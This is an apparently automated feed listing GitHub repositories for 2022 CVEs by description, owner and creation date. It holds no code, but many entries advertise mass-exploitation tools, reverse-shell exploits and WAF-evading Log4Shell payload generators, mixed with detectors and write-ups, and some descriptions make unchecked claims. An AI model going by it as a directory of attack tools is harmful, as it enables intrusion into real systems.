Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2018-14041 create time: 2022-05-23T07:59:01Z

Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2019-11358 create time: 2022-05-23T08:51:42Z

Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2019-8331 create time: 2022-05-23T07:48:19Z

Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2020-11023 create time: 2022-05-23T10:49:19Z

Vulnearability Report of the New Jersey official site : korestreet/https-nj.gov---CVE-2020-11022 create time: 2022-05-23T10:26:10Z

Case for CVE-2022-30778 : kang8/CVE-2022-30778 create time: 2022-05-23T07:04:54Z

Aplicação para explorar CVEs e calcular CVSSs. Atividade de segurança de aplicações (2022/1) : Jefh-Graduacao/segapps-cve-exporer create time: 2022-05-23T00:34:07Z

CVE 2005 exploit.Perl in Perl. : RizeKishimaro/CVE-2005-3299 create time: 2022-05-22T15:14:57Z

Apache CouchDB 3.2.1 - Remote Code Execution (RCE) : XmasSnowISBACK/CVE-2022-24706 create time: 2022-05-22T13:37:06Z

MSF screenshot module with privelage escalation/bypass on MacOS : XmasSnowISBACK/CVE-2022-26726 create time: 2022-05-22T13:31:52Z

Case for CVE-2021-43503 : kang8/CVE-2021-43503 create time: 2022-05-22T12:54:39Z

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust : XmasSnowISBACK/CVE-2022-1388 create time: 2022-05-22T13:27:33Z

cve-2022-1040 is an auth bypass and remote code execution in webmin portal of sophos firewall : XmasSnowISBACK/CVE-2022-1040 create time: 2022-05-22T13:23:20Z

PoC for CVE-2022-21971 "Windows Runtime Remote Code Execution Vulnerability" : XmasSnowISBACK/CVE-2022-21971 create time: 2022-05-22T13:20:39Z

cve-2022-1040 is an auth bypass and remote code execution in webmin portal of sophos firewall : cve-hunter/CVE-2022-1040-RCE create time: 2022-05-22T12:21:01Z

Big-Ip auth bypass and rce : seciurdt/CVE-2022-1388-mass create time: 2022-05-22T12:08:25Z

no description : pashayogi/CVE-2020-7961-Mass create time: 2022-05-22T08:40:53Z

no description : trhacknon/CVE-2022-22963 create time: 2022-05-21T22:10:16Z

Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution : UNICORDev/exploit-CVE-2020-5844 create time: 2022-05-19T22:50:44Z

A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to versi… : jsnhcuan1997/UltramanGaia create time: 2022-05-21T16:30:37Z

CVE-2022-22916,O2OA RCE 远程命令执行 : aodsec/CVE-2022-22916 create time: 2022-05-21T16:28:23Z

A Simple bash script that patches the CVE-2022-0847 (dirty pipe) kernel vulnerability on Debian 11 : IHenakaarachchi/debian11-dirty_pipe-patcher create time: 2022-05-21T15:14:51Z

no description : sudoninja-noob/CVE-2022-29009 create time: 2022-05-21T11:58:36Z

no description : sudoninja-noob/CVE-2022-29008 create time: 2022-05-21T11:58:26Z

no description : sudoninja-noob/CVE-2022-29007 create time: 2022-05-21T11:57:04Z

no description : sudoninja-noob/CVE-2022-29006 create time: 2022-05-21T11:55:36Z

no description : sudoninja-noob/CVE-2022-29005 create time: 2022-05-21T11:53:35Z

no description : BabyTeam1024/CVE-2022-26318 create time: 2022-05-21T11:51:58Z

no description : sudoninja-noob/CVE-2022-29004 create time: 2022-05-21T11:30:32Z

cve-2021-4034 for single commcand : wudicainiao/cve-2021-4034 create time: 2022-05-21T05:42:01Z

race condition in apport lead to Local Privilege Escalation on Ubuntu : liumuqing/CVE-2021-3899_PoC create time: 2022-05-21T01:52:34Z

Recursive MMIO VM Escape PoC : QiuhaoLi/CVE-2021-3929-3947 create time: 2022-05-13T05:33:28Z

no description : trhacknon/CVE-2022-26717-Safari-WebGL-Exploit create time: 2022-05-20T20:46:40Z

CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows : seciurdt/CVE-2022-26809-MASS create time: 2022-05-20T15:16:30Z

CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime : XmasSnowISBACK/CVE-2022-26809 create time: 2022-05-20T14:26:38Z

CVE-2017-1000486 : prok3z/Nuclei-Template-Primefaces-RCE create time: 2022-05-20T12:43:10Z

CVE-2022-31245: RCE and domain admin privilege escalation for Mailcow : ly1g3/Mailcow-CVE-2022-31245 create time: 2022-05-20T10:05:55Z

CVE-2021-44228 PoC for more than 12 affected softwares(not publicly disclossed yet) with mass exploitation script for each. : TomArni680/CVE-2021-44228-RCE create time: 2022-05-20T09:48:24Z

no description : ShaikUsaf/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302 create time: 2022-05-20T06:33:47Z

Apache CouchDB 3.2.1 - Remote Code Execution (RCE) : sadshade/CVE-2022-24706-CouchDB-Exploit create time: 2022-05-20T04:28:51Z

CVE-2022-22965 Spring4Shell research & PoC : cxzero/CVE-2022-22965-spring4shell create time: 2022-05-19T23:16:40Z

no description : trhacknon/CVE-2022-28590 create time: 2022-05-19T21:27:09Z

no description : trhacknon/CVE-2022-29464 create time: 2022-05-19T21:24:02Z

no description : corelight/cve-2022-22954 create time: 2022-04-12T18:08:58Z

一个可单独、批量验证的脚本,也可以反弹shell : anansec/CVE-2022-22947_EXP create time: 2022-05-19T14:58:45Z

This repository is developed to analysis and understand DirtyPipe exploit CVE-2022-0847 : VinuKalana/DirtyPipe-CVE-2022-0847 create time: 2022-05-17T04:23:34Z

no description : caiquebaracho/CVE-2021-44228 create time: 2022-05-19T13:49:40Z

This repository contains studies on CVE-2021-44228. I would like to thank everyone who somehow supported the development of this work. : caiquebaracho/CVE-2021-44228 create time: 2022-05-18T22:58:26Z

CVE-2022-30525 Zyxel防火墙命令注入漏洞 POC&EXP : west9b/CVE-2022-30525 create time: 2022-05-19T12:21:08Z

CVE-2022-30525 Zyxel防火墙命令注入漏洞 POC&EXP : 160Team/CVE-2022-30525 create time: 2022-05-19T12:09:42Z

PoC for Dirty COW (CVE-2016-5195) : 1equeneRise/scumjr9 create time: 2022-05-19T10:53:43Z

CVE-2022-26809 RCE Exploit Remote Code Execution : rkxxz/CVE-2022-26809 create time: 2022-05-19T03:35:02Z

CVE-2022-24500 RCE Exploit Remote Code Execution Vulnerability : rkxxz/CVE-2022-24500 create time: 2022-05-19T03:32:12Z

no description : theori-io/CVE-2022-26717-Safari-WebGL-Exploit create time: 2022-05-19T01:16:01Z

Verifed Proof of Concept on CVE-2022-24086 : oK0mo/CVE-2022-24086-RCE-PoC create time: 2022-05-19T01:15:57Z

no description : trhacknon/XSS-CVE-2022-30489 create time: 2022-05-18T23:28:06Z

no description : trhacknon/CVE-2022-23131 create time: 2022-05-18T17:18:45Z

no description : trhacknon/CVE-2022-30525-Reverse-Shell create time: 2022-05-18T15:57:03Z

CVE-2022-30780 - lighttpd remote denial of service : p0dalirius/CVE-2022-30780-lighttpd-denial-of-service create time: 2022-05-18T12:01:17Z

Simple python script to exploit CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection : Chocapikk/CVE-2022-30525-Reverse-Shell create time: 2022-05-18T15:22:17Z

Analysis, POC and Explanation of CVE-2021-1732 : reccoon-dev/CVE-2021-1732 create time: 2022-05-18T13:34:07Z

CVE-2021-44228 PoC for more than 12 affected softwares(not publicly disclossed yet) with mass exploitation script for each. : kuznyJan1972/CVE-2021-44228-mass create time: 2022-05-18T12:30:14Z

zyxel firewall unauthenticated rce mass multi threaded exploit : kuznyJan1972/CVE-2022-30525-mass create time: 2022-05-18T12:10:11Z

The Repository contains documents that explains the explotation of CVE-2016-5195 : malinthag62/The-exploitation-of-Dirty-Cow-CVE-2016-5195 create time: 2022-05-18T10:51:23Z

no description : jakabakos/CVE-2017-9096 create time: 2022-05-18T10:03:53Z

no description : litios/cve_2021_3572-old-pip create time: 2022-05-18T10:08:35Z

Franklin Fueling Systems Colibri Controller Module - Local File Inclusion : Henry4E36/CVE-2021-46417 create time: 2022-05-18T09:14:51Z

A POC for CVE-2021-3572 against old pips (9.x.x) : litios/cve_2021_3572-old-pip create time: 2022-05-18T08:42:31Z

no description : yonggui-li/CVE-2020-4464-and-CVE-2020-4450 create time: 2022-05-18T02:02:51Z

Zyxel multithreaded Mass Exploitation tool compatible with URL/IP lists. : ExploitPwner/CVE-2022-30525-Zyxel-Mass-Exploiter create time: 2022-05-17T15:58:19Z

no description : afaq1337/CVE-2021-41946 create time: 2022-05-17T15:23:12Z

Detects attempts and successful exploitation of CVE-2022-26809 : corelight/cve-2022-26809 create time: 2022-04-14T16:58:09Z

no description : phor3nsic/CVE-2021-40822 create time: 2022-05-17T13:58:11Z

Details regarding the Z-Wave S0-No-More attack : ITSecLab-HSEL/CVE-2022-24611 create time: 2022-05-17T11:55:09Z

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust : aancw/CVE-2022-1388-rs create time: 2022-05-17T10:51:39Z

CVE-2018-6574: go get RCE : ThaFWord/pentesterlab create time: 2022-05-17T08:32:20Z

CVE-2022-1388 : getdrive/F5-BIG-IP-exploit create time: 2022-05-17T03:23:39Z

Multithread Golang application : iveresk/cve-2022-21907 create time: 2022-05-16T17:42:45Z

[Reserved for CVE-2022-30006] : ComparedArray/printix-CVE-2022-30006 create time: 2022-05-16T16:15:52Z

The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks : V35HR4J/CVE-2022-1598 create time: 2022-05-16T15:33:48Z

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947) 注入哥斯拉内存马 : 0730Nophone/CVE-2022-22947- create time: 2022-05-16T15:27:41Z

no description : ratiros01/CVE-2014-8609-exploit create time: 2022-05-16T13:24:39Z

no description : user16-et/cve-2021-21972_PoC create time: 2022-05-16T11:57:42Z

Persistent XSS on 'last_known_version' field (My Settings) : patrickdeanramos/CVE-2022-28598 create time: 2022-05-16T10:27:47Z

Persistent XSS on 'last_known_version' field (My Settings) : patrickdeanramos/CVE-2022-28598 create time: 2022-05-16T10:17:37Z

CVE-2022-30525 POC exploit : superzerosec/CVE-2022-30525 create time: 2022-05-16T09:15:43Z

CVE-2021-21315-ENV : H3rmesk1t/CVE-2021-21315-ENV create time: 2022-05-16T08:30:31Z

no description : ratiros01/CVE-2004-1561 create time: 2020-06-09T14:54:00Z

CVE-2022-30525(Zxyel 防火墙命令注入)的概念证明漏洞利用 : YGoldking/CVE-2022-30525 create time: 2022-05-16T04:45:43Z

Exploit for CVE-2021-3560 (Polkit) : UNICORDev/exploit-CVE-2021-3560 create time: 2022-05-02T23:56:31Z

no description : Wrin9/CVE-2022-1388 create time: 2022-05-16T01:49:44Z

MyBB 1.8.29 - Remote Code Execution : lavclash75/mybb-CVE-2022-24734 create time: 2022-05-15T19:18:32Z

Private keys vulnerable to Debian OpenSSL bug (CVE-2008-0166) : badkeys/debianopenssl create time: 2022-05-15T10:28:03Z

Improved POC for CVE-2022-1388 that affects multiple F5 products. : iveresk/cve-2022-1388-iveresk-command-shell create time: 2022-05-15T08:58:22Z

A bots loader for CVE-2022-29464 with multithreading : Inplex-sys/CVE-2022-29464-loader create time: 2022-05-15T08:51:16Z

Private keys generated with vulnerable keypair versions (CVE-2021-41117) : badkeys/keypairvuln create time: 2022-05-15T06:56:53Z

Zyxel Firewall Remote Command Injection Vulnerability (CVE-2022-30525) Batch Detection Script : M4fiaB0y/CVE-2022-30525 create time: 2022-05-15T06:20:06Z

An Improved Proof of Concept for CVE-2022-1388 w/ Interactive an Shell : PsychoSec2/CVE-2022-1388-POC create time: 2022-05-15T03:58:21Z

cve-2021-38314 - Unauthenticated Sensitive Information Disclosure : twseptian/cve-2021-38314 create time: 2022-05-15T02:10:01Z

**An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed kwargs. : ahsentekdemir/CVE-2022-28346 create time: 2022-05-15T00:24:19Z

An improved Proof of Concept for CVE-2022-1388 w/ Interactive Shell. No reverse tcp required! : PsychoSec2/CVE-2022-1388-POC create time: 2022-05-14T19:23:16Z

In essence, the vulnerability allowed a low-privileged user to escalate privileges to domain administrator in a default Active Directory environment with the Active Directory Certificate Services (AD CS) server role installed. : LudovicPatho/CVE-2022-26923_AD-Certificate-Services create time: 2022-05-14T09:27:06Z

Technical Analysis of the SMB vulnerability (CVE-2017-0143) & its impact on the vulnerable system : SampatDhakal/Metasploit-Attack-Report create time: 2022-05-14T07:26:31Z

no description : badboycxcc/XSS-CVE-2022-30489 create time: 2022-05-06T00:47:51Z

no description : cxaqhq/netgear-to-CVE-2022-29383 create time: 2021-12-26T13:33:16Z

no description : badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383 create time: 2021-12-22T10:06:59Z

A proof-of-concept font with a write-up attached. : Exploitables/CVE-2022-26927 create time: 2022-05-14T04:12:23Z

Zyxel 防火墙未经身份验证的远程命令注入 : savior-only/CVE-2022-30525 create time: 2022-05-13T18:16:31Z

no description : testaross4/CVE-2007-2447 create time: 2022-05-13T14:15:28Z

Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525)批量检测脚本 : shuai06/CVE-2022-30525 create time: 2022-05-13T12:58:43Z

Log4Shell Proof-Of-Concept derived from https://github.com/kozmer/log4j-shell-poc : Phineas09/CVE-2021-44228 create time: 2022-05-13T11:35:22Z

Zyxel 防火墙远程命令注入漏洞(CVE-2022-30525) : Henry4E36/CVE-2022-30525 create time: 2022-05-13T12:03:28Z

Tool for CVE-2022-1388 : justakazh/CVE-2022-1388 create time: 2022-05-13T10:18:29Z

Melissa : itstarsec/CVE-2020-0618 create time: 2022-05-13T08:58:16Z

WPQA < 5.2 - Subscriber+ Stored Cross-Site Scripting via Profile fields : V35HR4J/CVE-2022-1051 create time: 2022-05-13T06:50:25Z

Essay (and PoCs) about CVE-2021-41773, a remote code execution vulnerability in Apache 2.4.49 🕸️ : iosifache/ApacheRCEEssay create time: 2022-05-12T13:23:08Z

NETATALK-AFP-PROTO RCE :| This CVE-2022-23121 allows remote malicious users to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parse_entries function. The issue results from the lack of proper error handling when parsing AppleDouble entries. An attacker can leverage this vulnerability to execute code in the context of root. : kuznyJan1972/CVE-2022-23121-RCE create time: 2022-05-12T20:58:01Z

Testing CVE-2022-22968 : MarcinGadz/spring-rce-poc create time: 2022-05-12T18:25:18Z

F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB : Zeyad-Azima/CVE-2022-1388 create time: 2022-05-12T16:54:52Z

CVE-2022-23121 中使用到的自定义 nmap 脚本,以及 docker 环境 : kejaly/CVE-2022-23121-nmap create time: 2022-05-12T17:07:08Z

CVE-2022-23253 PoC : nettitude/CVE-2022-23253-PoC create time: 2022-05-12T13:18:47Z

Proof of concept exploit for CVE-2022-30525 (Zxyel firewall command injection) : jbaines-r7/victorian_machinery create time: 2022-05-10T10:31:19Z

Nuclei Template for CVE-2022-1388 : SecTheBit/CVE-2022-1388 create time: 2022-05-12T12:17:11Z

no description : Nivaskumark/external_expat_v2.1.0_CVE-2022-25315 create time: 2022-05-12T11:07:10Z

no description : Calvitz/CVE-2022-26809 create time: 2022-05-12T07:12:08Z

CVE-2022-27134 : Kenun99/CVE-batdappboomx create time: 2022-03-11T09:09:19Z

CVE-2021-41773 Shodan scanner : anldori/CVE-2021-41773-Scanner create time: 2022-05-12T03:42:24Z

no description : Calvitz/CVE-2022-26809 create time: 2022-05-12T03:22:31Z

CVE-2020-0688_Microsoft Exchange default MachineKeySection deserialize vulnerability : 7heKnight/CVE-2020-0688 create time: 2022-05-12T03:17:35Z

CVE-2021-41773 Shodan Scanner : anldori/CVE-2021-41773-Scan create time: 2022-05-12T02:58:14Z

Walkthrough on the exploitation of CVE-2022-26923, a vulnerability in AD Certificate Services : r1skkam/TryHackMe-CVE-2022-26923 create time: 2022-05-12T02:31:50Z

no description : pauloink/CVE-2022-1388 create time: 2022-05-11T21:55:43Z

CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows : seciurdt/CVE-2022-26809-RCE create time: 2022-05-11T20:38:55Z

This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE) : omnigodz/CVE-2022-1388 create time: 2022-05-11T20:27:36Z

This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE) : omnigodz/CVE-2022-1388 create time: 2022-05-11T20:24:02Z

CVE-2022-1388 : mr-vill4in/CVE-2022-1388 create time: 2022-05-11T20:13:09Z

CVE-2022-1388 Scanner : EvilLizard666/CVE-2022-1388 create time: 2022-05-11T19:33:37Z

no description : AmirHoseinTangsiriNET/CVE-2022-1388-Scanner create time: 2022-05-11T17:43:44Z

big-ip icontrol rest auth bypass RCE MASS with huge list of ip dumped : kuznyJan1972/cve-2022-1388-mass create time: 2022-05-11T14:57:31Z

no description : ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315 create time: 2022-05-11T09:31:06Z

Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636. : Snip3R69/CVE-2013-4710-WebView-RCE-Vulnerability create time: 2022-05-11T08:53:56Z

no description : ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314 create time: 2022-05-11T09:11:39Z

no description : ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313 create time: 2022-05-11T07:40:30Z

WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,该漏洞允许远程攻击者上传和执行任意PHP代码。 : adminsec5247/CVE-2020-25213-wordpress-wp-file-manager-fileupload create time: 2022-05-11T07:10:15Z

Home Owners Collection Management System 1.0 - Reflected XSS : bigzooooz/CVE-2022-28078 create time: 2022-05-11T06:28:28Z

Home Owners Collection Management System 1.0 - Reflected XSS : bigzooooz/CVE-2022-28077 create time: 2022-05-11T06:23:46Z

On F5 BIG-IP undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated : ExploitPwner/CVE-2022-1388 create time: 2022-05-11T00:15:07Z

no description : 0xAgun/CVE-2022-1388 create time: 2022-05-10T20:49:12Z

no description : gerr-re/cve-2022-28944 create time: 2022-05-10T17:52:31Z

no description : sprushed/CVE-2022-30292 create time: 2022-05-10T16:39:00Z

An unauthenticated attacker can send an HTTP request with an "Accept-Encoding" HTTP request header triggering a double free in the unknown coding-list inside the HTTP Protocol Stack (http.sys) to process packets, resulting in a kernel crash. : iveresk/cve-2021-43008-1vere-k create time: 2022-05-10T16:00:50Z

CVE-2022-1388-PocExp,新增了多线程,F5 BIG-IP RCE exploitation : aodsec/CVE-2022-1388-PocExp create time: 2022-05-10T15:44:50Z

A Test API for testing the POC against CVE-2022-1388 : bandit92/CVE2022-1388_TestAPI create time: 2022-05-10T15:34:14Z

Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP) : thatonesecguy/CVE-2022-1388-Exploit create time: 2022-05-10T15:16:12Z

[Reserved For CVE-2022-29554] : ComparedArray/printix-CVE-2022-29554 create time: 2022-05-10T14:37:19Z

[Reserved for CVE-2022-29553] : ComparedArray/printix-CVE-2022-29553 create time: 2022-05-10T14:36:36Z

[Reserved for CVE-2022-29552] : ComparedArray/printix-CVE-2022-29552 create time: 2022-05-10T14:35:57Z

[Reserved For CVE-2022-29551] : ComparedArray/printix-CVE-2022-29551 create time: 2022-05-10T14:35:15Z

CVE-2022-24086 and CVE-2022-24087 are an rce in adobe commerce and magento : TomArni680/CVE-2022-24086-rce create time: 2022-05-10T14:32:06Z

CVE-2007-2447 : Nosferatuvjr/Samba-Usermap-exploit create time: 2022-05-10T09:37:07Z

no description : Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852 create time: 2022-05-10T09:22:18Z

no description : vesperp/CVE-2022-1388-F5-BIG-IP- create time: 2022-05-10T09:12:22Z

BIG-IP iControl REST vulnerability CVE-2022-1388 PoC : shamo0/CVE-2022-1388 create time: 2022-05-10T08:44:24Z

Simple shell script for the exploit : iveresk/cve-2022-1388-1veresk create time: 2022-05-10T08:22:46Z

CVE-2022-1388-EXP可批量实现攻击 : LinJacck/CVE-2022-1388-EXP create time: 2022-05-10T08:09:30Z

no description : hou5/CVE-2022-1388 create time: 2022-05-10T07:24:33Z

no description : Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388 create time: 2022-05-10T05:30:11Z

POC of CVE-2022-1388 : chesterblue/CVE-2022-1388 create time: 2022-05-10T04:51:06Z

Reverse Shell for CVE-2022-1388 : qusaialhaddad/F5-BigIP-CVE-2022-1388 create time: 2022-05-10T04:44:05Z

may the poc with you! : killvxk/CVE-2022-1388 create time: 2022-05-10T04:13:47Z

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services. : MrCl0wnLab/Nuclei-Template-Exploit-CVE-2022-1388-BIG-IP-iControl-REST create time: 2022-05-10T04:10:46Z

PoC For F5 BIG-IP - bash script Exploit one Liner : Stonzyy/Exploit-F5-CVE-2022-1388 create time: 2022-05-10T02:57:31Z

no description : lowkey0808/cve-2020-25540 create time: 2022-05-10T02:33:46Z

no description : trhacknon/CVE-2022-1388-RCE-checker create time: 2022-05-09T17:34:28Z

A Insecure direct object references (IDOR) vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor : FlaviuPopescu/CVE-2022-28986 create time: 2022-05-09T17:07:37Z

A Two-Factor Authentication (2FA) bypass vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor : FlaviuPopescu/CVE-2022-28601 create time: 2022-05-09T16:57:14Z

CVE-2022-1040 is an authentication bypass and rce in user portal and webadmin of sophos firewall : Seatwe/CVE-2022-1040-rce create time: 2022-05-09T16:49:58Z

CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime : ExploitPwner/CVE-2022-26809-RCE-POC create time: 2022-05-09T16:48:30Z

CVE-2022-1388 POC exploit : superzerosec/CVE-2022-1388 create time: 2022-05-09T15:42:55Z

Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection. : r3kind1e/Log4Shell-obfuscated-payloads-generator create time: 2022-05-09T15:02:29Z

CVE-2022-1388 : saucer-man/CVE-2022-1388 create time: 2022-05-09T15:24:27Z

CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞 : savior-only/CVE-2022-1388 create time: 2022-05-09T14:37:04Z

no description : jcarabantes/CVE-2022-28590 create time: 2022-05-09T14:12:58Z

no description : cve-hunter/CVE-2022-1388-mass create time: 2022-05-09T14:09:49Z

多线程验证 : Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388- create time: 2022-05-09T14:09:34Z

F5 BIG-IP iControl REST身份验证绕过漏洞 : Henry4E36/CVE-2022-1388 create time: 2022-05-09T14:02:34Z

CVE-2022-1388 F5 BIG-IP iControl REST RCE : Al1ex/CVE-2022-1388 create time: 2022-05-09T14:01:38Z

no description : HoAd-sc/CVE_2022_1388 create time: 2022-05-09T13:41:11Z

no description : Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492 create time: 2022-05-09T13:20:03Z

Apisix系列漏洞:未授权漏洞(CVE-2021-45232)、默认秘钥(CVE-2020-13945)批量探测。 : YutuSec/Apisix_Crack create time: 2022-05-09T12:26:11Z

Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)批量验证和利用脚本 : Pear1y/CVE-2022-26133 create time: 2022-05-09T12:07:51Z

Poc Exploit for BIG-IP Pre-Auth RCE - CVE-2022-1388 : crowsec-edtech/CVE-2022-1388 create time: 2022-05-09T11:58:37Z

POC for CVE-2022-1388 : horizon3ai/CVE-2022-1388 create time: 2022-05-09T11:46:45Z

Exploit and Check Script for CVE 2022-1388 : ZephrFish/F5-CVE-2022-1388-Exploit create time: 2022-05-09T11:30:09Z

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE : 0xf4n9x/CVE-2022-1388 create time: 2022-05-09T10:22:31Z

CVE-2022-1388 F5 Big IP unauth remote code execution : Vulnmachines/F5-Big-IP-CVE-2022-1388 create time: 2022-05-09T10:46:19Z

F5 BIG-IP RCE exploitation (CVE-2022-1388) : alt3kx/CVE-2022-1388_PoC create time: 2022-05-09T10:34:38Z

batch scan CVE-2022-1388 : yukar1z0e/CVE-2022-1388 create time: 2022-05-09T10:06:11Z

PoC for CVE-2022-1388_F5_BIG-IP : sherlocksecurity/CVE-2022-1388_F5_BIG-IP create time: 2022-05-09T07:39:55Z

no description : Hudi233/CVE-2022-1388 create time: 2022-05-09T03:20:46Z

Files required to demonstrate CVE-2022-0847 vulnerability in Linux Kernel v5.8 : isaiahsimeone/COMP3320-VAPT create time: 2022-05-08T20:17:08Z

no description : Altelus1/CVE-2022-24734 create time: 2022-05-08T15:20:41Z

CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows : seciurdt/CVE-2022-26809-POC create time: 2022-05-08T15:00:29Z

no description : blind-intruder/CVE-2022-1388-RCE-checker create time: 2022-05-08T09:28:19Z

UNIT4 TETA Mobile Edition 29HF13 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page. : LongWayHomie/CVE-2022-27434 create time: 2022-05-07T21:57:15Z

no description : jr64/CVE-2015-0311 create time: 2022-05-07T21:08:23Z

BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388 : TomArni680/CVE-2022-1388-RCE create time: 2022-05-07T18:02:55Z

CVE-2022-1388 F5 BIG-IP iControl Rest API exposed RCE Check : bytecaps/F5-BIG-IP-RCE-Check create time: 2022-05-07T17:54:08Z

A vulnerability scanner that detects CVE-2021-21980 vulnerabilities. : Osyanina/westone-CVE-2022-1388-scanner create time: 2022-05-07T12:36:41Z

SambaCry exploit (CVE-2017-7494) : eulercode/exploit-CVE-2017-7494 create time: 2022-05-07T11:42:40Z

CVE-2022-25075 totolink command injection vulnerability : kuznyJan1972/CVE-2022-25075-RCE create time: 2022-05-07T11:43:01Z

Just proof of concept for Cisco CVE-2020-3452. Using external or internal file base. : iveresk/cve-2020-3452 create time: 2022-05-07T09:45:25Z

FFMPEG heap overflow exploit CVE-2016-10190 : muzalam/FFMPEG-exploit create time: 2022-05-07T06:51:05Z

I don't own this, but this is from Nmap : WTSTiNy/CVE-2014-3704 create time: 2022-05-07T03:00:27Z

CVE-2021-43287_GoCD_fileread_POC_EXP : Wrin9/CVE-2021-43287 create time: 2022-05-07T02:54:59Z

no description : LinJacck/CVE-2022-29464 create time: 2022-05-07T03:00:08Z

fuzzing with libFuzzer,inlude openssl heartbleed (CVE-2014-0160) : GardeniaWhite/fuzzing create time: 2022-05-07T00:52:46Z

WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation : biulove0x/CVE-2022-0441 create time: 2022-05-06T17:40:55Z

no description : u201424348/CVE-2022-21984 create time: 2022-05-06T17:08:43Z

may the poc with you : killvxk/CVE-2022-1040 create time: 2022-05-06T08:56:04Z

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only. : MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed create time: 2022-05-06T06:22:47Z

no description : Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236 create time: 2022-05-06T05:19:11Z

Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5) : jheeree/CVE-2022-1388-checker create time: 2022-05-05T15:25:53Z

BIG : TomArni680/CVE-2022-1388-POC create time: 2022-05-05T14:55:45Z

no description : 0xRaw/CVE-2021-42183 create time: 2022-05-05T13:45:43Z

K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 : numanturle/CVE-2022-1388 create time: 2022-05-05T10:35:35Z

no description : Nivaskumark/packages_apps_settings_A10_r33_CVE-2020-0188 create time: 2022-05-05T09:23:04Z

no description : cve-hunter/CVE-2022-1040-sophos-rce create time: 2022-05-05T10:15:38Z

CVE-2022-22954 analyst : nguyenv1nK/CVE-2022-22954 create time: 2022-05-05T10:06:44Z

no description : KrungSalad/POC-CVE-2022-1444 create time: 2022-05-05T09:03:29Z

CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code : MarcelloTinocor/gerhart01 create time: 2022-05-05T07:56:13Z

no description : crypt0r00t/CVE-2022-26809 create time: 2022-05-05T06:51:05Z

1 : axin2019/CVE-2022-29464 create time: 2022-05-05T06:02:52Z

Improper privilege management vulnerability in Samsung Video Player prior to version 7.3.15.30 allows attackers to execute video files without permission. : heegong/CVE-2022-24924 create time: 2022-05-05T03:08:53Z

CMS Made Simple < 2.2.10 - SQL Injection (rewritten for python3), CVE-2019-905 : xtafnull/CMS-made-simple-sqli-python3 create time: 2022-05-04T09:26:45Z

PoC + vulnerability details for CVE-2022-25262 / JetBrains Hub single-click SAML response takeover : yuriisanin/CVE-2022-25262 create time: 2022-05-03T21:38:58Z

